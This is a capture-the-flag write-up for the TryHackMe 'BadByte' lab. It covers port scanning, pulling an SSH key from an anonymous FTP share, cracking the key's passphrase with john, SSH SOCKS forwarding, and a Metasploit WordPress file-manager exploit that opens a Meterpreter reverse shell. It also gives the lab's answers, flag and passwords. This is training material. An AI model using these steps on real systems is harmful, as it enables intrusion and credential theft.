An easy machine from tryhackme that covers basic port scanning, cracking ssh passwords, ssh port forwading
Reconnaissance
I've used rustscan for the scan
└─$rustscan-a10.10.184.227---sC-sV.----..-..-..----..---..----..---..--..-..-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| ||.-. \| {_}|.-._}}||.-._}}\ }//\ \| |\|`-' `-'`-----'`----'`-' `----' `---' `-'`-'`-' `-'The Modern Day Port Scanner.________________________________________: https://discord.gg/GFrQsGy :: https://github.com/RustScan/RustScan : --------------------------------------Real hackers hack time ⌛[~] The config file is expected to be at "/home/devcli3nt/.rustscan.toml"[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.184.227:22Open 10.10.184.227:30024[~] Starting Script(s)[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")PORT STATE SERVICE REASON VERSION22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9/A7kkuN5E+SS1C6w1NfeY196Rj4Y1Yx7njNCwNaCgIv8m+V+7MTHsRn3txLXRTHXErMqW3ypCmmjuY3O40kAragZSgA/XhdesGxGVa0szHK7H4fB28uQiyZgkOfIt/12kGaHB3iGwOeex2Hdg6ct4FdxTWKgDvuKZSLVoPXG66R8SOHql2cXfUtzyUMNJTTqoUED69soEJVG2ctfPKXi4BfFqM3OK2HgKzbmcSPXlLUTNhlcvjPuTa0kMRqiNTMVdP0PjSFdoaMviXHiznW7Fn6NHe3R/vIQt8Ac05Mdvim21QjRpJ4pm7v5+q1wXCJxGG6Ov71yThKP6yZ4ByMl
| 256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM9QUKykbzCSI7+PgoVzHNKOVIWf+zm0LN/f4n0VJc/P0J9TzLImkYHIOCnRFpNUPtiWGXbHXi67FQxEpgZMReo=
| 256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKrvf1zJBhqU1RxUCYuTgoIy+7NzCqZeFWV67bt8+APV30024/tcp open ftp syn-ack vsftpd 3.0.3| ftp-anon: Anonymous FTP login allowed (FTP code 230)| -rw-r--r-- 1 ftp ftp 1743 Mar 23 2021 id_rsa|_-rw-r--r-- 1 ftp ftp 78 Mar 23 2021 note.txt| ftp-syst: | STAT: | FTP server status:| Connected to ::ffff:10.9.2.60| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| Data connections will be plain text| At session startup, client count was 4| vsFTPd 3.0.3 - secure, fast, stable|_End of statusService Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds
Questions
How many ports are open?
2
What service is running on the lowest open port?
ssh
What non-standard port is open?
30024
What service is running on the non-standard port?
ftp
Foothold
Rustscan detected that anonymous login was enabled in FTP
└─$catnote.txtIalwaysforgetmypassword.Justletmestoreansshkeyhere.-errorcauser└─$locatessh2john/usr/share/john/ssh2john.py└─$/usr/share/john/ssh2john.pyid_rsa>hashfile└─$john--wordlist=/usr/share/wordlists/rockyou.txthashfileUsingdefaultinputencoding:UTF-8Loaded1passwordhash (SSH [RSA/DSA/EC/OPENSSH (SSH privatekeys) 32/64])Cost1 (KDF/cipher [0=MD5/AES 1=MD5/3DES2=Bcrypt/AES]) is 1 for all loaded hashesCost2 (iteration count) is 2 for all loaded hashesWillrun4OpenMPthreadsNote:Thisformatmayemitfalsepositives,soitwillkeeptryingevenafterfindingapossiblecandidate.Press'q'orCtrl-Ctoabort,almostanyotherkeyforstatuscupcake (id_rsa)Warning:Only2candidatesleft,minimum4neededforperformance.1g0:00:00:22DONE (2022-01-27 09:02) 0.04522g/s 648652p/s 648652c/s 648652C/sa6_123..*7¡Vamos!Sessioncompleted
Questions
What username do we find during the enumeration process?
errorcauser
What is the passphrase for the RSA private key?
cupcake
Port Forwarding
Create a SSH port forward
└─$ssh-iid_rsa-D1337errorcauser@10.10.184.227# After the connection change socks settings in proxychains└─$sudonano/etc/proxychains4.conf# socks5 127.0.0.1 1337
Now run proxychains and nmap to get internal ports information
└─$nmap-p80127.0.0.1-sC-sVStartingNmap7.91 ( https://nmap.org ) at 2022-01-27 09:41 ISTNmapscanreportforlocalhost (127.0.0.1)Hostisup (0.00017s latency).PORTSTATESERVICEVERSION80/tcpopenhttpApachehttpd2.4.29 ((Ubuntu))|_http-generator:WordPress5.7|_http-server-header:Apache/2.4.29 (Ubuntu)|_http-title:BadByte– You're looking at me, but they are lookin...Servicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:1IPaddress (1 hostup) scanned in 11.46 seconds
msf6>use0[*] Using configured payload php/meterpreter/reverse_tcpmsf6exploit(multi/http/wp_file_manager_rce) >setRHOSTS127.0.0.1RHOSTS =>127.0.0.1msf6exploit(multi/http/wp_file_manager_rce) >setLHOST10.9.2.60LHOST =>10.9.2.60msf6exploit(multi/http/wp_file_manager_rce) >run[*] Started reverse TCP handler on 10.9.2.60:4444 [*] Executing automatic check (disableAutoChecktooverride)[+] The target appears to be vulnerable.[*] 127.0.0.1:80 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/CMRdTO.php[*] Sending stage (39282bytes) to 10.10.184.227[+] Deleted CMRdTO.php[*] Meterpreter session 1 opened (10.9.2.60:4444 ->10.10.184.227:58718) at 2021-05-03 19:42:28 +0200
Questions
What CMS is running on the machine?
wordpress
What is the CVE number for directory traversal vulnerability?
CVE-2020-11738
What is the CVE number for remote code execution vulnerability?
CVE-2020-25213
What is the name of user that was running CMS?
cth
-What is the user flag?
THM{227906201d17d9c45aa93d0122ea1af7}
Privilege Escalation
The old password was stored in cat /var/log/bash.log : [ G00dP@$sw0rd2020 ]